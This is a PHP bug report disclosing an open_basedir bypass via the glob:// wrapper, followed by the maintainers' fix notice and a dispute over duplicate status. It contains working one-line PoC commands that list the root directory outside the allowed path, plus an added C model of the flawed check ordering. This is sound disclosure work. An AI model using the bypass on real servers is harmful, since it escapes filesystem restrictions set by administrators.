Sec Bug #73710 open_basedir bypass via glob wrapper
Submitted: 2016-12-10 14:39 UTC Modified: 2017-01-10 00:33 UTC
From: beched at ya dot ru Assigned: pollita (profile)
Status: Duplicate Package: Directory function related
PHP Version: Irrelevant OS:
Private report: No CVE-ID: None
 [2016-12-10 14:39 UTC] beched at ya dot ru
Description:
------------
This is a very old and well-known issue, which I decided to report almost 5 years after posting it on the rdot forum.
The reason is here: http://lxr.php.net/xref/PHP-7.1/main/streams/glob_wrapper.c#208
The wrapper prefix "glob://" is cut off _after_ php_check_open_basedir is called, so the path is considered relative, whereas it is absolute.
Obviously, the if-block on line 216 should be put after line 221, where the path is sliced.

Test script:
---------------
php -dopen_basedir=/home/beched -r 'foreach(new DirectoryIterator("glob:///*") as $f) echo "$f\n";'

or

php -dopen_basedir=/home/beched -r 'foreach(new GlobIterator("/*") as $f) echo "$f\n";'

Expected result:
----------------
PHP Fatal error:  Uncaught UnexpectedValueException: DirectoryIterator::__construct(): open_basedir restriction in effect. File(glob:///*) is not within the allowed path(s): (/home/beched) in Command line code:1
Stack trace:
#0 Command line code(1): DirectoryIterator->__construct('glob:///*')
#1 {main}
  thrown in Command line code on line 1


Actual result:
--------------
bin
boot
build
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
logs
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
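
The ordering problem described in the report above, as an added example that is not part of the original report or of PHP's source: a simplified C model in which the path check resolves non-absolute paths against the working directory. The names basedir_allows, strip_glob_prefix and the two opendir_* variants are hypothetical, and the basedir and cwd values are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Simplified stand-in for an open_basedir check (assumption, not PHP's code):
 * a path not starting with '/' is resolved against cwd, then the result must
 * equal basedir or lie below it. */
static int basedir_allows(const char *basedir, const char *cwd, const char *path)
{
    char resolved[512];
    size_t n = strlen(basedir);

    if (path[0] == '/')
        snprintf(resolved, sizeof resolved, "%s", path);
    else
        snprintf(resolved, sizeof resolved, "%s/%s", cwd, path);
    return strncmp(resolved, basedir, n) == 0 &&
           (resolved[n] == '/' || resolved[n] == '\0');
}

/* Drop the "glob://" wrapper prefix to get the pattern glob() will see. */
static const char *strip_glob_prefix(const char *path)
{
    return strncmp(path, "glob://", 7) == 0 ? path + 7 : path;
}

/* Order described in the report: check first, strip afterwards. */
static int opendir_check_then_strip(const char *basedir, const char *cwd, const char *path)
{
    if (!basedir_allows(basedir, cwd, path))  /* sees "glob:///*" as relative */
        return 0;
    path = strip_glob_prefix(path);  /* the pattern used from here was never checked */
    (void)path;
    return 1;
}

/* Corrected order: strip first, then check the string that glob() receives. */
static int opendir_strip_then_check(const char *basedir, const char *cwd, const char *path)
{
    return basedir_allows(basedir, cwd, strip_glob_prefix(path));
}

int main(void)
{
    const char *bd = "/home/beched", *cwd = "/home/beched"; /* constructed values */
    printf("check-then-strip allows: %d\n", opendir_check_then_strip(bd, cwd, "glob:///*"));
    printf("strip-then-check allows: %d\n", opendir_strip_then_check(bd, cwd, "glob:///*"));
    return 0;
}
```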

 [2017-01-09 18:47 UTC] pollita@php.net
-Assigned To: +Assigned To: pollita
 [2017-01-10 00:17 UTC] pollita@php.net
-Status: Assigned +Status: Closed
 [2017-01-10 00:17 UTC] pollita@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276
 [2017-01-10 00:33 UTC] stas@php.net
-Status: Closed +Status: Duplicate
 [2017-01-10 00:33 UTC] stas@php.net
Same as bug #73891.
 [2017-01-10 09:46 UTC] beched at ya dot ru
Well, I guess you created a relation recursion of reports.
Bug #73891 is a duplicate of this (and was reported 1 month later, while this report was ignored), not vice versa.
 
Last updated: Tue May 21 08:01:26 2019 UTC